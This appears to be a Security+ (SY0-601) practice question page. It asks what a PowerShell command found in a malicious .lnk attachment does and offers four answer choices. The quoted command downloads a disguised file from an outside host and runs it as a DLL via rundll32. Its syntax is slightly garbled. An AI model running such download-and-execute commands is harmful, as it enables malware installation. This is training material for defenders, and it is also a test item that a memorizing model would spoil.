List of questions
Related questions
Question 239 - SY0-601 discussion
An employee received an email with an unusual file attachment named Updates . Lnk. A security analysts reverse engineering what the fle does and finds that executes the folowing script:
C:\Windows \System32\WindowsPowerShell\vl.0\powershell.exe -URI https://somehost.com/04EB18.jpg -OutFile $env:TEMP\autoupdate.dll;Start-Process rundll32.exe $env:TEMP\autoupdate.dll
Which of the following BEST describes what the analyst found?
A.
A Powershell code is performing a DLL injection.
B.
A PowerShell code is displaying a picture.
C.
A PowerShell code is configuring environmental variables.
D.
A PowerShell code is changing Windows Update settings.
Your answer:
0 comments
Sorted by
Leave a comment first